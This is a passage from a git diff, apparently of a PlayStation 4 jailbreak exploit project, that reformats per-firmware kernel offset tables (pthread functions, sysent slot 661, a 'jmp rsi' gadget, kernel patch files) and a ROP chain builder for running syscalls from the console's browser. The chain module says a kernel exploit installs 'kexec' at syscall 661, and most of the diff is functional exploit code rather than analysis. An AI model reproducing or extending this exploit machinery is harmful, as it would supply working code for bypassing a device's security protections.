- 'pthread_barrier_wait' : 0xb8c0,
- 'pthread_barrier_destroy' : 0x9c10,
- 'pthread_exit' : 0x25320,
-}));
+export const pthread_offsets = new Map(
+ Object.entries({
+ pthread_create: 0xebb0,
+ pthread_join: 0x29d60,
+ pthread_barrier_init: 0x283d0,
+ pthread_barrier_wait: 0xb8c0,
+ pthread_barrier_destroy: 0x9c10,
+ pthread_exit: 0x25320,
+ }),
+);
export const off_kstr = 0x7da91c;
export const off_cpuid_to_pcpu = 0x1cfc240;
@@ -32,4 +34,4 @@ export const off_cpuid_to_pcpu = 0x1cfc240;
export const off_sysent_661 = 0x11041b0;
export const jmp_rsi = 0xc810d;
-export const patch_elf_loc = './kpatch/850.bin'; // Relative to `../../lapse.mjs`
+export const patch_elf_loc = "./kpatch/850.bin"; // Relative to `../../lapse.mjs`
diff --git a/src/lapse/ps4/900.mjs b/src/lapse/ps4/900.mjs
index 9e15290..407dc9d 100644
--- a/src/lapse/ps4/900.mjs
+++ b/src/lapse/ps4/900.mjs
@@ -17,14 +17,16 @@ along with this program. If not, see . */
// 9.00
-export const pthread_offsets = new Map(Object.entries({
- 'pthread_create' : 0x25510,
- 'pthread_join' : 0xafa0,
- 'pthread_barrier_init' : 0x273d0,
- 'pthread_barrier_wait' : 0xa320,
- 'pthread_barrier_destroy' : 0xfea0,
- 'pthread_exit' : 0x77a0,
-}));
+export const pthread_offsets = new Map(
+ Object.entries({
+ pthread_create: 0x25510,
+ pthread_join: 0xafa0,
+ pthread_barrier_init: 0x273d0,
+ pthread_barrier_wait: 0xa320,
+ pthread_barrier_destroy: 0xfea0,
+ pthread_exit: 0x77a0,
+ }),
+);
export const off_kstr = 0x7f6f27;
export const off_cpuid_to_pcpu = 0x21ef2a0;
@@ -32,4 +34,4 @@ export const off_cpuid_to_pcpu = 0x21ef2a0;
export const off_sysent_661 = 0x1107f00;
export const jmp_rsi = 0x4c7ad;
-export const patch_elf_loc = './kpatch/900.bin'; // Relative to `../../lapse.mjs`
+export const patch_elf_loc = "./kpatch/900.bin"; // Relative to `../../lapse.mjs`
diff --git a/src/lapse/ps4/903.mjs b/src/lapse/ps4/903.mjs
index f6f37a2..fb1179d 100644
--- a/src/lapse/ps4/903.mjs
+++ b/src/lapse/ps4/903.mjs
@@ -17,14 +17,16 @@ along with this program. If not, see . */
// 9.03, 9.04
-export const pthread_offsets = new Map(Object.entries({
- 'pthread_create' : 0x25510,
- 'pthread_join' : 0xafa0,
- 'pthread_barrier_init' : 0x273d0,
- 'pthread_barrier_wait' : 0xa320,
- 'pthread_barrier_destroy' : 0xfea0,
- 'pthread_exit' : 0x77a0,
-}));
+export const pthread_offsets = new Map(
+ Object.entries({
+ pthread_create: 0x25510,
+ pthread_join: 0xafa0,
+ pthread_barrier_init: 0x273d0,
+ pthread_barrier_wait: 0xa320,
+ pthread_barrier_destroy: 0xfea0,
+ pthread_exit: 0x77a0,
+ }),
+);
export const off_kstr = 0x7f4ce7;
export const off_cpuid_to_pcpu = 0x21eb2a0;
@@ -32,4 +34,4 @@ export const off_cpuid_to_pcpu = 0x21eb2a0;
export const off_sysent_661 = 0x1103f00;
export const jmp_rsi = 0x5325b;
-export const patch_elf_loc = './kpatch/903.bin'; // Relative to `../../lapse.mjs`
+export const patch_elf_loc = "./kpatch/903.bin"; // Relative to `../../lapse.mjs`
diff --git a/src/lapse/ps4/950.mjs b/src/lapse/ps4/950.mjs
index 5d7a45c..085d74e 100644
--- a/src/lapse/ps4/950.mjs
+++ b/src/lapse/ps4/950.mjs
@@ -17,14 +17,16 @@ along with this program. If not, see . */
// 9.50, 9.51, 9.60
-export const pthread_offsets = new Map(Object.entries({
- 'pthread_create' : 0x1c540,
- 'pthread_join' : 0x9560,
- 'pthread_barrier_init' : 0x24200,
- 'pthread_barrier_wait' : 0x1efb0,
- 'pthread_barrier_destroy' : 0x19450,
- 'pthread_exit' : 0x28ca0,
-}));
+export const pthread_offsets = new Map(
+ Object.entries({
+ pthread_create: 0x1c540,
+ pthread_join: 0x9560,
+ pthread_barrier_init: 0x24200,
+ pthread_barrier_wait: 0x1efb0,
+ pthread_barrier_destroy: 0x19450,
+ pthread_exit: 0x28ca0,
+ }),
+);
export const off_kstr = 0x769a88;
export const off_cpuid_to_pcpu = 0x21a66c0;
@@ -32,4 +34,4 @@ export const off_cpuid_to_pcpu = 0x21a66c0;
export const off_sysent_661 = 0x1100ee0;
export const jmp_rsi = 0x15a6d;
-export const patch_elf_loc = './kpatch/950.bin'; // Relative to `../../lapse.mjs`
+export const patch_elf_loc = "./kpatch/950.bin"; // Relative to `../../lapse.mjs`
diff --git a/src/module/chain.mjs b/src/module/chain.mjs
index 13d33ba..9df0160 100644
--- a/src/module/chain.mjs
+++ b/src/module/chain.mjs
@@ -15,90 +15,85 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see . */
-import { Int, lohi_from_one } from './int64.mjs';
-import { get_view_vector } from './memtools.mjs';
-import { Addr } from './mem.mjs';
+import { Int, lohi_from_one } from "./int64.mjs";
+import { get_view_vector } from "./memtools.mjs";
+import { Addr } from "./mem.mjs";
-import * as config from '../config.mjs';
+import * as config from "../config.mjs";
// put the sycall names that you want to use here
-export const syscall_map = new Map(Object.entries({
- 'read' : 3,
- 'write' : 4,
- 'open' : 5,
- 'close' : 6,
- 'getpid' : 20,
- 'setuid' : 23,
- 'getuid' : 24,
- 'accept' : 30,
- 'pipe' : 42,
- 'ioctl' : 54,
- 'munmap' : 73,
- 'mprotect' : 74,
- 'fcntl' : 92,
- 'socket' : 97,
- 'connect' : 98,
- 'bind' : 104,
- 'setsockopt' : 105,
- 'listen' : 106,
- 'getsockopt' : 118,
- 'fchmod' : 124,
- 'socketpair' : 135,
- 'fstat' : 189,
- 'getdirentries' : 196,
- '__sysctl' : 202,
- 'mlock' : 203,
- 'clock_gettime' : 232,
- 'nanosleep' : 240,
- 'sched_yield' : 331,
- 'kqueue' : 362,
- 'kevent' : 363,
- 'rtprio_thread' : 466,
- 'mmap' : 477,
- 'ftruncate' : 480,
- 'shm_open' : 482,
- 'cpuset_getaffinity' : 487,
- 'cpuset_setaffinity' : 488,
- 'jitshm_create' : 533,
- 'jitshm_alias' : 534,
- 'evf_create' : 538,
- 'evf_delete' : 539,
- 'evf_set' : 544,
- 'evf_clear' : 545,
- 'set_vm_container' : 559,
- 'dmem_container' : 586,
- 'dynlib_dlsym' : 591,
- 'dynlib_get_list' : 592,
- 'dynlib_get_info' : 593,
- 'dynlib_load_prx' : 594,
- 'randomized_path' : 602,
- 'budget_get_ptype' : 610,
- 'thr_suspend_ucontext' : 632,
- 'thr_resume_ucontext' : 633,
- 'blockpool_open' : 653,
- 'blockpool_map' : 654,
- 'blockpool_unmap' : 655,
- 'blockpool_batch' : 657,
+export const syscall_map = new Map(
+ Object.entries({
+ read: 3,
+ write: 4,
+ open: 5,
+ close: 6,
+ getpid: 20,
+ setuid: 23,
+ getuid: 24,
+ accept: 30,
+ pipe: 42,
+ ioctl: 54,
+ munmap: 73,
+ mprotect: 74,
+ fcntl: 92,
+ socket: 97,
+ connect: 98,
+ bind: 104,
+ setsockopt: 105,
+ listen: 106,
+ getsockopt: 118,
+ fchmod: 124,
+ socketpair: 135,
+ fstat: 189,
+ getdirentries: 196,
+ __sysctl: 202,
+ mlock: 203,
+ clock_gettime: 232,
+ nanosleep: 240,
+ sched_yield: 331,
+ kqueue: 362,
+ kevent: 363,
+ rtprio_thread: 466,
+ mmap: 477,
+ ftruncate: 480,
+ shm_open: 482,
+ cpuset_getaffinity: 487,
+ cpuset_setaffinity: 488,
+ jitshm_create: 533,
+ jitshm_alias: 534,
+ evf_create: 538,
+ evf_delete: 539,
+ evf_set: 544,
+ evf_clear: 545,
+ set_vm_container: 559,
+ dmem_container: 586,
+ dynlib_dlsym: 591,
+ dynlib_get_list: 592,
+ dynlib_get_info: 593,
+ dynlib_load_prx: 594,
+ randomized_path: 602,
+ budget_get_ptype: 610,
+ thr_suspend_ucontext: 632,
+ thr_resume_ucontext: 633,
+ blockpool_open: 653,
+ blockpool_map: 654,
+ blockpool_unmap: 655,
+ blockpool_batch: 657,
// syscall 661 is unimplemented so free for use. a kernel exploit will
// install "kexec" here
- 'aio_submit' : 661,
- 'kexec' : 661,
- 'aio_multi_delete' : 662,
- 'aio_multi_wait' : 663,
- 'aio_multi_poll' : 664,
- 'aio_multi_cancel' : 666,
- 'aio_submit_cmd' : 669,
- 'blockpool_move' : 673,
-}));
+ aio_submit: 661,
+ kexec: 661,
+ aio_multi_delete: 662,
+ aio_multi_wait: 663,
+ aio_multi_poll: 664,
+ aio_multi_cancel: 666,
+ aio_submit_cmd: 669,
+ blockpool_move: 673,
+ }),
+);
-const argument_pops = [
- 'pop rdi; ret',
- 'pop rsi; ret',
- 'pop rdx; ret',
- 'pop rcx; ret',
- 'pop r8; ret',
- 'pop r9; ret',
-];
+const argument_pops = ["pop rdi; ret", "pop rsi; ret", "pop rdx; ret", "pop rcx; ret", "pop r8; ret", "pop r9; ret"];
// implementations are expected to have these gadgets:
// * libSceLibcInternal:
@@ -176,400 +171,402 @@ const argument_pops = [
// stack_size: the size of the stack
// upper_pad: the amount of extra space above stack
export class ChainBase {
- constructor(stack_size=0x1000, upper_pad=0x10000) {
- this._is_dirty = false;
- this.position = 0;
+ constructor(stack_size = 0x1000, upper_pad = 0x10000) {
+ this._is_dirty = false;
+ this.position = 0;
- const return_value = new Uint32Array(4);
- this._return_value = return_value;
- this.retval_addr = get_view_vector(return_value);
+ const return_value = new Uint32Array(4);
+ this._return_value = return_value;
+ this.retval_addr = get_view_vector(return_value);
- const errno = new Uint32Array(1);
- this._errno = errno;
- this.errno_addr = get_view_vector(errno);
+ const errno = new Uint32Array(1);
+ this._errno = errno;
+ this.errno_addr = get_view_vector(errno);
- const full_stack_size = upper_pad + stack_size;
- const stack_buffer = new ArrayBuffer(full_stack_size);
- const stack = new DataView(stack_buffer, upper_pad);
- this.stack = stack;
- this.stack_addr = get_view_vector(stack);
- this.stack_size = stack_size;
- this.full_stack_size = full_stack_size;
+ const full_stack_size = upper_pad + stack_size;
+ const stack_buffer = new ArrayBuffer(full_stack_size);
+ const stack = new DataView(stack_buffer, upper_pad);
+ this.stack = stack;
+ this.stack_addr = get_view_vector(stack);
+ this.stack_size = stack_size;
+ this.full_stack_size = full_stack_size;
+ }
+
+ // use this if you want to write a new ROP chain but don't want to allocate
+ // a new instance
+ empty() {
+ this.position = 0;
+ }
+
+ // flag indicating whether .run() was ever called with this chain
+ get is_dirty() {
+ return this._is_dirty;
+ }
+
+ clean() {
+ this._is_dirty = false;
+ }
+
+ dirty() {
+ this._is_dirty = true;
+ }
+
+ check_allow_run() {
+ if (this.position === 0) {
+ throw Error("chain is empty");
+ }
+ if (this.is_dirty) {
+ throw Error("chain already ran, clean it first");
+ }
+ }
+
+ reset() {
+ this.empty();
+ this.clean();
+ }
+
+ get retval_int() {
+ return this._return_value[0] | 0;
+ }
+
+ get retval() {
+ return new Int(this._return_value[0], this._return_value[1]);
+ }
+
+ // return value as a pointer
+ get retval_ptr() {
+ return new Addr(this._return_value[0], this._return_value[1]);
+ }
+
+ set retval(value) {
+ const values = lohi_from_one(value);
+ const retval = this._return_value;
+ retval[0] = values[0];
+ retval[1] = values[1];
+ }
+
+ get retval_all() {
+ const retval = this._return_value;
+ return [new Int(retval[0], retval[1]), new Int(retval[2], retval[3])];
+ }
+
+ set retval_all(values) {
+ const [a, b] = [lohi_from_one(values[0]), lohi_from_one(values[1])];
+ const retval = this._return_value;
+ retval[0] = a[0];
+ retval[1] = a[1];
+ retval[2] = b[0];
+ retval[3] = b[1];
+ }
+
+ get errno() {
+ return this._errno[0];
+ }
+
+ set errno(value) {
+ this._errno[0] = value;
+ }
+
+ push_value(value) {
+ const position = this.position;
+ if (position >= this.stack_size) {
+ throw Error(`no more space on the stack, pushed value: ${value}`);
}
- // use this if you want to write a new ROP chain but don't want to allocate
- // a new instance
- empty() {
- this.position = 0;
- }
+ const values = lohi_from_one(value);
+ const stack = this.stack;
+ stack.setUint32(position, values[0], true);
+ stack.setUint32(position + 4, values[1], true);
- // flag indicating whether .run() was ever called with this chain
- get is_dirty() {
- return this._is_dirty;
- }
+ this.position += 8;
+ }
- clean() {
- this._is_dirty = false;
- }
-
- dirty() {
- this._is_dirty = true;
- }
-
- check_allow_run() {
- if (this.position === 0) {
- throw Error('chain is empty');
- }
- if (this.is_dirty) {
- throw Error('chain already ran, clean it first');
- }
- }
-
- reset() {
- this.empty();
- this.clean();
- }
-
- get retval_int() {
- return this._return_value[0] | 0;
- }
-
- get retval() {
- return new Int(this._return_value[0], this._return_value[1]);
- }
-
- // return value as a pointer
- get retval_ptr() {
- return new Addr(this._return_value[0], this._return_value[1]);
- }
-
- set retval(value) {
- const values = lohi_from_one(value);
- const retval = this._return_value;
- retval[0] = values[0];
- retval[1] = values[1];
- }
-
- get retval_all() {
- const retval = this._return_value;
- return [new Int(retval[0], retval[1]), new Int(retval[2], retval[3])];
- }
-
- set retval_all(values) {
- const [a, b] = [lohi_from_one(values[0]), lohi_from_one(values[1])];
- const retval = this._return_value;
- retval[0] = a[0];
- retval[1] = a[1];
- retval[2] = b[0];
- retval[3] = b[1];
- }
-
- get errno() {
- return this._errno[0];
- }
-
- set errno(value) {
- this._errno[0] = value;
- }
-
- push_value(value) {
- const position = this.position;
- if (position >= this.stack_size) {
- throw Error(`no more space on the stack, pushed value: ${value}`);
- }
-
- const values = lohi_from_one(value);
- const stack = this.stack;
- stack.setUint32(position, values[0], true);
- stack.setUint32(position + 4, values[1], true);
-
- this.position += 8;
- }
-
- get_gadget(insn_str) {
- const addr = this.gadgets.get(insn_str);
- if (addr === undefined) {
- throw Error(`gadget not found: ${insn_str}`);
- }
-
- return addr;
- }
-
- push_gadget(insn_str) {
- this.push_value(this.get_gadget(insn_str));
- }
-
- push_call(func_addr, ...args) {
- if (args.length > 6) {
- throw TypeError(
- 'push_call() does not support functions that have more than 6'
- + ' arguments');
- }
-
- for (let i = 0; i < args.length; i++) {
- this.push_gadget(argument_pops[i]);
- this.push_value(args[i]);
- }
-
- // The address of our buffer seems to be always aligned to 8 bytes.
- // SysV calling convention requires the stack is aligned to 16 bytes on
- // function entry, so push an additional 8 bytes to pad the stack. We
- // pushed a "ret" gadget for a noop.
- if ((this.position & (0x10 - 1)) !== 0) {
- this.push_gadget('ret');
- }
-
- if (typeof func_addr === 'string') {
- this.push_gadget(func_addr);
- } else {
- this.push_value(func_addr);
- }
- }
-
- push_syscall(syscall_name, ...args) {
- if (typeof syscall_name !== 'string') {
- throw TypeError(`syscall_name not a string: ${syscall_name}`);
- }
-
- const sysno = syscall_map.get(syscall_name);
- if (sysno === undefined) {
- throw Error(`syscall_name not found: ${syscall_name}`);
- }
-
- const syscall_addr = this.syscall_array[sysno];
- if (syscall_addr === undefined) {
- throw Error(`syscall number not in syscall_array: ${sysno}`);
- }
-
- this.push_call(syscall_addr, ...args);
- }
-
- // Sets needed class properties
- //
- // Args:
- // gadgets:
- // A Map-like object mapping instruction strings (e.g. "pop rax; ret")
- // to their addresses in memory.
- // syscall_array:
- // An array whose indices correspond to syscall numbers. Maps syscall
- // numbers to their addresses in memory. Defaults to an empty Array.
- static init_class(gadgets, syscall_array=[]) {
- this.prototype.gadgets = gadgets;
- this.prototype.syscall_array = syscall_array;
- }
-
- // START: implementation-dependent parts
- //
- // the user doesn't need to implement all of these. just the ones they need
-
- // Firmware specific method to launch a ROP chain
- //
- // Proper implementations will check if .position is nonzero before
- // running. Implementations can optionally check .is_dirty to enforce
- // single-run gadget sequences
- run() {
- throw Error('not implemented');
- }
-
- // anything you need to do before the ROP chain jumps back to JavaScript
- push_end() {
- throw Error('not implemented');
- }
-
- push_get_errno() {
- throw Error('not implemented');
- }
-
- push_clear_errno() {
- throw Error('not implemented');
- }
-
- // get the rax register
- push_get_retval() {
- throw Error('not implemented');
- }
-
- // get the rax and rdx registers
- push_get_retval_all() {
- throw Error('not implemented');
- }
-
- // END: implementation-dependent parts
-
- // note that later firmwares (starting around > 5.00?), the browser doesn't
- // have a JIT compiler. we programmed in a way that tries to make the
- // resulting bytecode be optimal
- //
- // we intentionally have an incomplete set (there's no function to get a
- // full 128-bit result). we only implemented what we think are the common
- // cases. the user will have to implement those other functions if they
- // need it
-
- do_call(...args) {
- if (this.position) {
- throw Error('chain not empty');
- }
- try {
- this.push_call(...args);
- this.push_get_retval();
- this.push_get_errno();
- this.push_end();
- this.run();
- } finally {
- this.reset();
- }
- }
-
- call_void(...args) {
- this.do_call(...args);
- }
-
- call_int(...args) {
- this.do_call(...args);
- // x | 0 will always be a signed integer
- return this._return_value[0] | 0;
- }
-
- call(...args) {
- this.do_call(...args);
- const retval = this._return_value;
- return new Int(retval[0], retval[1]);
- }
-
- do_syscall(...args) {
- if (this.position) {
- throw Error('chain not empty');
- }
- try {
- this.push_syscall(...args);
- this.push_get_retval();
- this.push_get_errno();
- this.push_end();
- this.run();
- } finally {
- this.reset();
- }
- }
-
- syscall_void(...args) {
- this.do_syscall(...args);
- }
-
- syscall_int(...args) {
- this.do_syscall(...args);
- // x | 0 will always be a signed integer
- return this._return_value[0] | 0;
- }
-
- syscall(...args) {
- this.do_syscall(...args);
- const retval = this._return_value;
- return new Int(retval[0], retval[1]);
- }
-
- syscall_ptr(...args) {
- this.do_syscall(...args);
- const retval = this._return_value;
- return new Addr(retval[0], retval[1]);
- }
-
- // syscall variants that throw an error on errno
-
- do_syscall_clear_errno(...args) {
- if (this.position) {
- throw Error('chain not empty');
- }
- try {
- this.push_clear_errno();
- this.push_syscall(...args);
- this.push_get_retval();
- this.push_get_errno();
- this.push_end();
- this.run();
- } finally {
- this.reset();
- }
- }
-
- sysi(...args) {
- const errno = this._errno;
- this.do_syscall_clear_errno(...args);
-
- const err = errno[0];
- if (err !== 0) {
- throw Error(`syscall(${args[0]}) errno: ${err}`);
- }
-
- // x | 0 will always be a signed integer
- return this._return_value[0] | 0;
- }
-
- sys(...args) {
- const errno = this._errno;
- this.do_syscall_clear_errno(...args);
-
- const err = errno[0];
- if (err !== 0) {
- throw Error(`syscall(${args[0]}) errno: ${err}`);
- }
-
- const retval = this._return_value;
- return new Int(retval[0], retval[1]);
- }
-
- sysp(...args) {
- const errno = this._errno;
- this.do_syscall_clear_errno(...args);
-
- const err = errno[0];
- if (err !== 0) {
- throw Error(`syscall(${args[0]}) errno: ${err}`);
- }
-
- const retval = this._return_value;
- return new Addr(retval[0], retval[1]);
- }
-}
-
-export function get_gadget(map, insn_str) {
- const addr = map.get(insn_str);
+ get_gadget(insn_str) {
+ const addr = this.gadgets.get(insn_str);
if (addr === undefined) {
- throw Error(`gadget not found: ${insn_str}`);
+ throw Error(`gadget not found: ${insn_str}`);
}
return addr;
+ }
+
+ push_gadget(insn_str) {
+ this.push_value(this.get_gadget(insn_str));
+ }
+
+ push_call(func_addr, ...args) {
+ if (args.length > 6) {
+ throw TypeError("push_call() does not support functions that have more than 6 arguments");
+ }
+
+ for (let i = 0; i < args.length; i++) {
+ this.push_gadget(argument_pops[i]);
+ this.push_value(args[i]);
+ }
+
+ // The address of our buffer seems to be always aligned to 8 bytes.
+ // SysV calling convention requires the stack is aligned to 16 bytes on
+ // function entry, so push an additional 8 bytes to pad the stack. We
+ // pushed a "ret" gadget for a noop.
+ if ((this.position & (0x10 - 1)) !== 0) {
+ this.push_gadget("ret");
+ }
+
+ if (typeof func_addr === "string") {
+ this.push_gadget(func_addr);
+ } else {
+ this.push_value(func_addr);
+ }
+ }
+
+ push_syscall(syscall_name, ...args) {
+ if (typeof syscall_name !== "string") {
+ throw TypeError(`syscall_name not a string: ${syscall_name}`);
+ }
+
+ const sysno = syscall_map.get(syscall_name);
+ if (sysno === undefined) {
+ throw Error(`syscall_name not found: ${syscall_name}`);
+ }
+
+ const syscall_addr = this.syscall_array[sysno];
+ if (syscall_addr === undefined) {
+ throw Error(`syscall number not in syscall_array: ${sysno}`);
+ }
+
+ this.push_call(syscall_addr, ...args);
+ }
+
+ // Sets needed class properties
+ //
+ // Args:
+ // gadgets:
+ // A Map-like object mapping instruction strings (e.g. "pop rax; ret")
+ // to their addresses in memory.
+ // syscall_array:
+ // An array whose indices correspond to syscall numbers. Maps syscall
+ // numbers to their addresses in memory. Defaults to an empty Array.
+ static init_class(gadgets, syscall_array = []) {
+ this.prototype.gadgets = gadgets;
+ this.prototype.syscall_array = syscall_array;
+ }
+
+ // START: implementation-dependent parts
+ //
+ // the user doesn't need to implement all of these. just the ones they need
+
+ // Firmware specific method to launch a ROP chain
+ //
+ // Proper implementations will check if .position is nonzero before
+ // running. Implementations can optionally check .is_dirty to enforce
+ // single-run gadget sequences
+ run() {
+ throw Error("not implemented");
+ }
+
+ // anything you need to do before the ROP chain jumps back to JavaScript
+ push_end() {
+ throw Error("not implemented");
+ }
+
+ push_get_errno() {
+ throw Error("not implemented");
+ }
+
+ push_clear_errno() {
+ throw Error("not implemented");
+ }
+
+ // get the rax register
+ push_get_retval() {
+ throw Error("not implemented");
+ }
+
+ // get the rax and rdx registers
+ push_get_retval_all() {
+ throw Error("not implemented");
+ }
+
+ // END: implementation-dependent parts
+
+ // note that later firmwares (starting around > 5.00?), the browser doesn't
+ // have a JIT compiler. we programmed in a way that tries to make the
+ // resulting bytecode be optimal
+ //
+ // we intentionally have an incomplete set (there's no function to get a
+ // full 128-bit result). we only implemented what we think are the common
+ // cases. the user will have to implement those other functions if they
+ // need it
+
+ do_call(...args) {
+ if (this.position) {
+ throw Error("chain not empty");
+ }
+ try {
+ this.push_call(...args);
+ this.push_get_retval();
+ this.push_get_errno();
+ this.push_end();
+ this.run();
+ } finally {
+ this.reset();
+ }
+ }
+
+ call_void(...args) {
+ this.do_call(...args);
+ }
+
+ call_int(...args) {
+ this.do_call(...args);
+ // x | 0 will always be a signed integer
+ return this._return_value[0] | 0;
+ }
+
+ call(...args) {
+ this.do_call(...args);
+ const retval = this._return_value;
+ return new Int(retval[0], retval[1]);
+ }
+
+ do_syscall(...args) {
+ if (this.position) {
+ throw Error("chain not empty");
+ }
+ try {
+ this.push_syscall(...args);
+ this.push_get_retval();
+ this.push_get_errno();
+ this.push_end();
+ this.run();
+ } finally {
+ this.reset();
+ }
+ }
+
+ syscall_void(...args) {
+ this.do_syscall(...args);
+ }
+
+ syscall_int(...args) {
+ this.do_syscall(...args);
+ // x | 0 will always be a signed integer
+ return this._return_value[0] | 0;
+ }
+
+ syscall(...args) {
+ this.do_syscall(...args);
+ const retval = this._return_value;
+ return new Int(retval[0], retval[1]);
+ }
+
+ syscall_ptr(...args) {
+ this.do_syscall(...args);
+ const retval = this._return_value;
+ return new Addr(retval[0], retval[1]);
+ }
+
+ // syscall variants that throw an error on errno
+
+ do_syscall_clear_errno(...args) {
+ if (this.position) {
+ throw Error("chain not empty");
+ }
+ try {
+ this.push_clear_errno();
+ this.push_syscall(...args);
+ this.push_get_retval();
+ this.push_get_errno();
+ this.push_end();
+ this.run();
+ } finally {
+ this.reset();
+ }
+ }
+
+ sysi(...args) {
+ const errno = this._errno;
+ this.do_syscall_clear_errno(...args);
+
+ const err = errno[0];
+ if (err !== 0) {
+ throw Error(`syscall(${args[0]}) errno: ${err}`);
+ }
+
+ // x | 0 will always be a signed integer
+ return this._return_value[0] | 0;
+ }
+
+ sys(...args) {
+ const errno = this._errno;
+ this.do_syscall_clear_errno(...args);
+
+ const err = errno[0];
+ if (err !== 0) {
+ throw Error(`syscall(${args[0]}) errno: ${err}`);
+ }
+
+ const retval = this._return_value;
+ return new Int(retval[0], retval[1]);
+ }
+
+ sysp(...args) {
+ const errno = this._errno;
+ this.do_syscall_clear_errno(...args);
+
+ const err = errno[0];
+ if (err !== 0) {
+ throw Error(`syscall(${args[0]}) errno: ${err}`);
+ }
+
+ const retval = this._return_value;
+ return new Addr(retval[0], retval[1]);
+ }
+}
+
+export function get_gadget(map, insn_str) {
+ const addr = map.get(insn_str);
+ if (addr === undefined) {
+ throw Error(`gadget not found: ${insn_str}`);
+ }
+
+ return addr;
}
function load_fw_specific(version) {
- if (version & 0x10000) {
- throw RangeError('PS5 not supported yet');
- }
+ if (version & 0x10000) {
+ throw RangeError("PS5 not supported yet");
+ }
- const value = version & 0xffff;
- // we don't want to bother with very old firmwares that don't support
- // ECMAScript 2015. 6.xx WebKit poisons the pointer fields of some types
- // which can be annoying to deal with
- if (value < 0x700) {
- throw RangeError('PS4 firmwares < 7.00 isn\'t supported');
- }
+ const value = version & 0xffff;
+ // we don't want to bother with very old firmwares that don't support
+ // ECMAScript 2015. 6.xx WebKit poisons the pointer fields of some types
+ // which can be annoying to deal with
+ if (value < 0x700) {
+ throw RangeError("PS4 firmwares < 7.00 isn't supported");
+ }
- if (0x800 <= value && value < 0x850) { // 8.00, 8.01, 8.03
- return import('../rop/ps4/800.mjs');
- }
+ if (0x800 <= value && value < 0x850) {
+ // 8.00, 8.01, 8.03
+ return import("../rop/ps4/800.mjs");
+ }
- if (0x850 <= value && value < 0x900) { // 8.50, 8.52
- return import('../rop/ps4/850.mjs');
- }
+ if (0x850 <= value && value < 0x900) {
+ // 8.50, 8.52
+ return import("../rop/ps4/850.mjs");
+ }
- if (0x900 <= value && value < 0x950) { // 9.00, 9.03, 9.04
- return import('../rop/ps4/900.mjs');
- }
+ if (0x900 <= value && value < 0x950) {
+ // 9.00, 9.03, 9.04
+ return import("../rop/ps4/900.mjs");
+ }
- if (0x950 <= value && value < 0x1000) { // 9.50, 9.51, 9.60
- return import('../rop/ps4/950.mjs');
- }
+ if (0x950 <= value && value < 0x1000) {
+ // 9.50, 9.51, 9.60
+ return import("../rop/ps4/950.mjs");
+ }
- throw RangeError('Firmware not supported');
+ throw RangeError("Firmware not supported");
}
export let gadgets = null;
@@ -580,14 +577,8 @@ export let init_gadget_map = null;
export let Chain = null;
export async function init() {
- const module = await load_fw_specific(config.target);
- Chain = module.Chain;
- module.init(Chain);
- ({
- gadgets,
- libwebkit_base,
- libkernel_base,
- libc_base,
- init_gadget_map,
- } = module);
+ const module = await load_fw_specific(config.target);
+ Chain = module.Chain;
+ module.init(Chain);
+ ({ gadgets, libwebkit_base, libkernel_base, libc_base, init_gadget_map } = module);
}
diff --git a/src/module/int64.mjs b/src/module/int64.mjs
index 248872e..c35f893 100644
--- a/src/module/int64.mjs
+++ b/src/module/int64.mjs
@@ -19,115 +19,103 @@ along with this program. If not, see . */
const isInteger = Number.isInteger;
function check_not_in_range(x) {
- return !(isInteger(x) && -0x80000000 <= x && x <= 0xffffffff);
+ return !(isInteger(x) && -0x80000000 <= x && x <= 0xffffffff);
}
// use this if you want to support objects convertible to Int but only need
// their low/high bits. creating a Int is slower compared to just using this
// function
export function lohi_from_one(low) {
- if (low instanceof Int) {
- return low._u32.slice();
- }
+ if (low instanceof Int) {
+ return low._u32.slice();
+ }
- if (check_not_in_range(low)) {
- throw TypeError(`low not a 32-bit integer: ${low}`);
- }
+ if (check_not_in_range(low)) {
+ throw TypeError(`low not a 32-bit integer: ${low}`);
+ }
- return [low >>> 0, low < 0 ? -1 >>> 0 : 0];
+ return [low >>> 0, low < 0 ? -1 >>> 0 : 0];
}
// immutable 64-bit integer
export class Int {
- constructor(low, high) {
- if (high === undefined) {
- this._u32 = new Uint32Array(lohi_from_one(low));
- return;
- }
-
- if (check_not_in_range(low)) {
- throw TypeError(`low not a 32-bit integer: ${low}`);
- }
-
- if (check_not_in_range(high)) {
- throw TypeError(`high not a 32-bit integer: ${high}`);
- }
-
- this._u32 = new Uint32Array([low, high]);
+ constructor(low, high) {
+ if (high === undefined) {
+ this._u32 = new Uint32Array(lohi_from_one(low));
+ return;
}
- get lo() {
- return this._u32[0];
+ if (check_not_in_range(low)) {
+ throw TypeError(`low not a 32-bit integer: ${low}`);
}
- get hi() {
- return this._u32[1];
+ if (check_not_in_range(high)) {
+ throw TypeError(`high not a 32-bit integer: ${high}`);
}
- // return low/high as signed integers
+ this._u32 = new Uint32Array([low, high]);
+ }
- get bot() {
- return this._u32[0] | 0;
+ get lo() {
+ return this._u32[0];
+ }
+
+ get hi() {
+ return this._u32[1];
+ }
+
+ // return low/high as signed integers
+
+ get bot() {
+ return this._u32[0] | 0;
+ }
+
+ get top() {
+ return this._u32[1] | 0;
+ }
+
+ neg() {
+ const u32 = this._u32;
+ const low = (~u32[0] >>> 0) + 1;
+ return new this.constructor(low >>> 0, ((~u32[1] >>> 0) + (low > 0xffffffff)) >>> 0);
+ }
+
+ eq(b) {
+ const values = lohi_from_one(b);
+ const u32 = this._u32;
+ return u32[0] === values[0] && u32[1] === values[1];
+ }
+
+ ne(b) {
+ return !this.eq(b);
+ }
+
+ add(b) {
+ const values = lohi_from_one(b);
+ const u32 = this._u32;
+ const low = u32[0] + values[0];
+ return new this.constructor(low >>> 0, (u32[1] + values[1] + (low > 0xffffffff)) >>> 0);
+ }
+
+ sub(b) {
+ const values = lohi_from_one(b);
+ const u32 = this._u32;
+ const low = u32[0] + (~values[0] >>> 0) + 1;
+ return new this.constructor(low >>> 0, (u32[1] + (~values[1] >>> 0) + (low > 0xffffffff)) >>> 0);
+ }
+
+ toString(is_pretty = false) {
+ if (!is_pretty) {
+ const low = this.lo.toString(16).padStart(8, "0");
+ const high = this.hi.toString(16).padStart(8, "0");
+ return `0x${high}${low}`;
}
+ let high = this.hi.toString(16).padStart(8, "0");
+ high = `${high.substring(0, 4)}_${high.substring(4)}`;
- get top() {
- return this._u32[1] | 0;
- }
+ let low = this.lo.toString(16).padStart(8, "0");
+ low = `${low.substring(0, 4)}_${low.substring(4)}`;
- neg() {
- const u32 = this._u32;
- const low = (~u32[0] >>> 0) + 1;
